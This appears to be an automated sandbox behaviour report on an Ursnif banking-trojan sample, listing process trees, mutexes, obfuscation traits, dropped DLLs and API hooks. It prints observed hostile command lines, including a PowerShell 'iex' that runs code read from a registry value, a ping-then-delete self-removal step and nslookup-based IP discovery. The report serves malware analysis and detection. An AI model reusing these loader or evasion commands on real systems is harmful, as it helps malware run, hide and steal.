Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF386.tmp" "c:\Users\user\AppData\Local\Temp\i3mkzvx5\CSCB52324015C2F4AC8AC468C73504A2519.TMP"
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\anIV2qJeLD.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1B15.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1B15.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD669.tmp" "c:\Users\user\AppData\Local\Temp\pqwen5zh\CSC508E00641FC7448693989664B7E60.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF386.tmp" "c:\Users\user\AppData\Local\Temp\i3mkzvx5\CSCB52324015C2F4AC8AC468C73504A2519.TMP" Jump to behavior
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\anIV2qJeLD.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1B15.bi1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1B15.bi1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvos14d3.p1v.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C58F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_03C58F1B
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{D0EC51F0-EFD9-823E-F904-93D63D78776A}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{60D7F404-3F23-92D7-C994-E3E60D08C77A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{6806F28B-A7B6-DAC3-711C-CBAE35102FC2}
Source: C:\Windows\System32\PING.EXE Mutant created: \Sessions\1\BaseNamedObjects\{1CCC3CE5-CB78-AEF7-3510-2FC23944D316}
Source: C:\Windows\System32\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{347FEBA0-0321-86D2-2DA8-E71AB15C0BEE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_01
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Mutant created: \Sessions\1\BaseNamedObjects\{2C9A59B6-9B4F-3EC0-8520-FF528954A3A6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4616:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{FC92BFEC-2BD2-8EC1-95F0-8FA2992433F6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_01
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Command line argument: pemahu 1_2_0042EEB0
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Command line argument: Regefiri 1_2_0042EEB0
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Command line argument: Xegixaze 1_2_0042EEB0
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Command line argument: \H 1_2_0042EEB0
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Command line argument: zijiwe 1_2_0042EEB0
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Command line argument: 2Y? 1_2_0042EEB0
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Command line argument: mecevituxe 1_2_0042EEB0
Source: C:\Users\user\Desktop\anIV2qJeLD.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\anIV2qJeLD.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\anIV2qJeLD.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Users\user\Desktop\anIV2qJeLD.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: anIV2qJeLD.exe Static PE information: More than 200 imports for KERNEL32.dll
Source: anIV2qJeLD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: anIV2qJeLD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: anIV2qJeLD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: anIV2qJeLD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: anIV2qJeLD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: anIV2qJeLD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: anIV2qJeLD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: 5.pdbw=j source: powershell.exe, 0000000D.00000003.874385564.00000168B230A000.00000004.00000001.sdmp
Source: Binary string: C:\rukemimac\nizejezoyoja-seyikanasocin69\hezosiwem\100\paseve.pdb source: anIV2qJeLD.exe
Source: Binary string: ntdll.pdb source: anIV2qJeLD.exe, 00000001.00000003.821704923.0000000005CC0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.pdbXP source: powershell.exe, 0000000D.00000002.908777927.000001689D0FB000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: anIV2qJeLD.exe, 00000001.00000003.821704923.0000000005CC0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.pdb source: powershell.exe, 0000000D.00000002.908777927.000001689D0FB000.00000004.00000001.sdmp
Source: Binary string: 5.pdb source: powershell.exe, 0000000D.00000003.874385564.00000168B230A000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.pdb source: powershell.exe, 0000000D.00000002.908707605.000001689D0BA000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.pdbXP source: powershell.exe, 0000000D.00000002.908832791.000001689D133000.00000004.00000001.sdmp
Source: Binary string: h.pdb source: powershell.exe, 0000000D.00000003.874385564.00000168B230A000.00000004.00000001.sdmp
Source: Binary string: ]C:\rukemimac\nizejezoyoja-seyikanasocin69\hezosiwem\100\paseve.pdbP+C source: anIV2qJeLD.exe

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Unpacked PE file: 1.2.anIV2qJeLD.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Unpacked PE file: 1.2.anIV2qJeLD.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C5E9AC push 0B565A71h; ret 1_2_03C5E9B1
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C5AFAF push ecx; ret 1_2_03C5AFBF
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C5AC00 push ecx; ret 1_2_03C5AC09
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C5E62F push edi; retf 1_2_03C5E630
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_0042E5E0 push ecx; mov dword ptr [esp], 00000000h 1_2_0042E5E1
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FF2890 push ecx; ret 1_2_01FF2899
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FF2D7B push ecx; ret 1_2_01FF2D8B
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FEFECD push ecx; mov dword ptr [esp], 00000002h 1_2_01FEFECE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_01002890 push ecx; ret 40_2_01002899
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_01002D7B push ecx; ret 40_2_01002D8B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FFFECD push ecx; mov dword ptr [esp], 00000002h 40_2_00FFFECE
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_00401264 LoadLibraryA,GetProcAddress, 1_2_00401264
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.cmdline Jump to behavior
Source: initial sample Static PE information: section name: .text entropy: 7.03953998024

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.754079690.00000000046BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.889480040.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708583550.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.960938374.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.964489842.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708535895.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.890926362.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753558505.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708632359.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067279297.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067191125.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.894411476.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067358328.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.964378185.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708655559.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.826726374.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.961019371.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708643513.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.826674348.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067387619.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708560736.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.974756035.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067321148.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067077802.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067242360.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.1069046396.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067447371.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708619404.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.974847238.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.752543235.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: anIV2qJeLD.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4972, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6752, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: PING.EXE PID: 2280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 5844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 6656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1380, type: MEMORYSTR
Source: Yara match File source: 1.3.anIV2qJeLD.exe.42994a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.42994a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.47ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.48394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.47ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.anIV2qJeLD.exe.3c50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.4864ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.973836822.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.824591176.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753488992.00000000047BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.978653062.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1012362960.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1042231528.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.822930430.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.933683599.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.934438300.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.885186030.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.972065324.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.899852132.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1024798927.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.925739991.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753518401.0000000004839000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1039859823.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.895713343.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.970372197.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.887028110.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.947593693.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.936725813.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.974956334.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.825845900.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.970221418.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.961075351.0000000004299000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.883404432.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.905548648.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.968828960.00000000044C0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.942244917.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.918958280.00000168AA1CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1037934763.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1018627233.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Self deletion via cmd delete
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\anIV2qJeLD.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\anIV2qJeLD.exe
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
